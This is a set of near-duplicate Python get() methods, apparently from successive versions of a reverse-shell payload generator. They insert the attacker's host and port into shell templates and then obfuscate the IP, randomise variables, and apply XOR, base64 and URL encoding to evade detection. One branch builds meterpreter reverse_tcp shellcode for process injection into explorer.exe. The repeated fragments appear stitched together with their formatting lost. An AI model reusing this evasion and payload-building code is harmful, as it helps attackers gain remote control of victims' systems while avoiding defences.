def get(self): """ Generate the code. Apply encoding, in the correct order, of course. """ # Obfuscate IP and port if set in args if self.args.ipfuscate: self.port = obfuscate_port(self.port, self.args.obfuscate_small, self.lang) # Set connection data to the code. self.code = self.code.replace("PORT", str(self.port)) # Apply variable randomization self.code = randomize_vars(self.code, self.args.obfuscate_small, self.lang) # Apply powershell-tuning if set in args. self.code = powershell_wrapper(self.name, self.code, self.args) # Apply xor encoding. self.code = self.code if self.args.xor is 0 else xor_wrapper( self.name, self.code, self.args) # Apply base64 encoding. self.code = base64_wrapper(self.name, self.code, self.args) # Apply url-encoding if self.args.urlencode is True: self.code = to_urlencode(self.code) return self.code
def get(self): """ Generate the code. Apply encoding, in the correct order, of course. """ # Update of 0.3.6 # Some custom shells will not need TARGET and PORT strings. # To deal with that, I will just try to find them in the string first. if "TARGET" in self.code and "PORT" in self.code: self.code = str(self.code.replace("TARGET", self.host)).replace( "PORT", str(self.port)) # Apply powershell-tuning if set in args. self.code = powershell_wrapper(self.name, self.code, self.args) else: # Custom shell. Here we need to program individually based in specifics. if "bloodseeker" in self.name.lower( ): # This is for Bloodseeker project. # This one requires a stager. if self.args.stager is None: print(error("This payload REQUIRES --stager flag.")) exit(1) print(info("Generating shellcode ...")) malicious_script = str( WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace( "SHELLCODEHERE", shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp", self.args.host, self.args.port)) self.code = malicious_script.replace( "PROCESSNAME", "explorer") # we want inject into explorer.exe print( alert( "Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening in your machine." )) return self.code # we dont need encoder in this one. else: print( error( "No custom shell procedure was arranged for this shell. This is fatal." )) exit(1) # Apply xor encoding. self.code = self.code if self.args.xor is 0 else xor_wrapper( self.name, self.code, self.args) # Apply base64 encoding. self.code = base64_wrapper(self.name, self.code, self.args) # Apply URL-encoding if self.args.urlencode is True and self.args.stager is None: self.code = to_urlencode(self.code) return self.code
def get(self): """ Generate the code. Apply encoding, in the correct order, of course. """ # Apply base64 encoding. self.payload = base64_wrapper(self.name, self.payload, self.args) # Apply URL-encoding if self.args.urlencode is True: self.payload = to_urlencode(self.payload) return self.payload
def get(self): """ Generate the code. Apply encoding, in the correct order, of course. """ # Update of 0.3.6 # Some custom shells will not need TARGET and PORT strings. # To deal with that, I will just try to find them in the string first. if "TARGET" in self.code and "PORT" in self.code: self.code = str(self.code.replace("TARGET", self.host)).replace("PORT", str(self.port)) # Apply powershell-tuning if set in args. self.code = powershell_wrapper(self.name, self.code, self.args) else: # Custom shell. Here we need to program individually based in specifics. # TODO: I need to separate this into a custom file. if "bat2meterpreter" in self.name.lower(): print(info("Generating shellcode ...")) return self.code + shellcode_to_hex("windows/meterpreter/reverse_tcp", self.args.host, self.args.port) if "bloodseeker" in self.name.lower(): # This is for Bloodseeker project. # This one requires a stager. if self.args.stager is None: print(error("This payload REQUIRES --stager flag.")) exit(1) print(info("Generating shellcode ...")) malicious_script = str(WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace("SHELLCODEHERE", shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp", self.args.host, self.args.port)) # TODO: Create a --bloodseeker-process flag to specify process name process_name = "explorer" self.code = malicious_script.replace("PROCESSNAME", process_name) print(alert("Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening \ in your machine.")) return self.code # we don't need encoder in this one. else: print(error("No custom shell procedure was arranged for this shell. This is fatal.")) exit(1) # Apply xor encoding. self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args) # Apply base64 encoding. self.code = base64_wrapper(self.name, self.code, self.args) # Apply URL-encoding if self.args.urlencode is True and self.args.stager is None: self.code = to_urlencode(self.code) return self.code
def get(self): """ Generate the code. Apply encoding, in the correct order, of course. """ self.code = self.code.replace("PORT", str(self.port)) # Apply xor encoding. self.code = self.code if self.args.xor is 0 else xor_wrapper( self.name, self.code, self.args) # Apply base64 encoding. self.code = base64_wrapper(self.name, self.code, self.args) # Apply url-encoding if self.args.urlencode is True: self.code = to_urlencode(self.code) return self.code
def get(self): """ Generate the code. Apply encoding, in the correct order, of course. """ # Set connection data to the code. self.code = self.code.replace("PORT", str(self.port)) # Apply powershell-tuning if set in args. self.code = powershell_wrapper(self.name, self.code, self.args) # Apply xor encoding. self.code = self.code if self.args.xor is 0 else xor_wrapper(self.name, self.code, self.args) # Apply base64 encoding. self.code = base64_wrapper(self.name, self.code, self.args) # Apply url-encoding if self.args.urlencode is True: self.code = to_urlencode(self.code) return self.code
def get(self): """ Generate the code. Apply encoding, in the correct order, of course. """ # Set connection data to the code. self.code = self.code.replace("PORT", str(self.port)) # Apply powershell-tuning if set in args. self.code = powershell_wrapper(self.name, self.code, self.args) # Apply xor encoding. self.code = self.code if self.args.xor is 0 else xor_wrapper( self.name, self.code, self.args) # Apply base64 encoding. self.code = base64_wrapper(self.name, self.code, self.args) # Apply url-encoding if self.args.urlencode is True: self.code = to_urlencode(self.code) return self.code
def get(self): """ Generate the code. Apply encoding, in the correct order, of course. """ # Obfuscate IP and port if set in args if self.args.ipfuscate and self.lang != "powershell": # Windows shells doesn't support ipfuscation self.host = ipfuscate(self.host, self.args.obfuscate_small) self.port = obfuscate_port(self.port, self.args.obfuscate_small, self.lang) # Update of 0.3.6 # Some custom shells will not need TARGET and PORT strings. # To deal with that, I will just try to find them in the string first. if "TARGET" in self.code and "PORT" in self.code: self.code = str(self.code.replace("TARGET", self.host)).replace( "PORT", str(self.port)) # Apply variable randomization self.code = randomize_vars(self.code, self.args.obfuscate_small, self.lang) # Apply powershell-tuning if set in args. self.code = powershell_wrapper(self.name, self.code, self.args) else: # Custom shell. Here we need to program individually based in specifics. # TODO: I need to separate this into a custom file. if "bat2meterpreter" in self.name.lower(): print(info("Generating shellcode ...")) return self.code + shellcode_to_hex( "windows/meterpreter/reverse_tcp", self.args.host, self.args.port) if "bloodseeker" in self.name.lower( ): # This is for Bloodseeker project. # This one requires a stager. if self.args.stager is None: print(error("This payload REQUIRES --stager flag.")) exit(1) print(info("Generating shellcode ...")) malicious_script = str( WINDOWS_BLOODSEEKER_SCRIPT.decode("base64")).replace( "SHELLCODEHERE", shellcode_to_ps1("windows/x64/meterpreter/reverse_tcp", self.args.host, self.args.port)) # TODO: Create a --bloodseeker-process flag to specify process name process_name = "explorer" self.code = malicious_script.replace("PROCESSNAME", process_name) print( alert( "Make sure you have a handler for windows/x64/meterpreter/reverse_tcp listening \ in your machine.")) return self.code # we don't need encoder in this one. else: print( error( "No custom shell procedure was arranged for this shell. This is fatal." )) exit(1) # Apply xor encoding. self.code = self.code if self.args.xor is 0 else xor_wrapper( self.name, self.code, self.args) # Apply base64 encoding. self.code = base64_wrapper(self.name, self.code, self.args) # Apply URL-encoding if self.args.urlencode is True and self.args.stager is None: self.code = to_urlencode(self.code) return self.code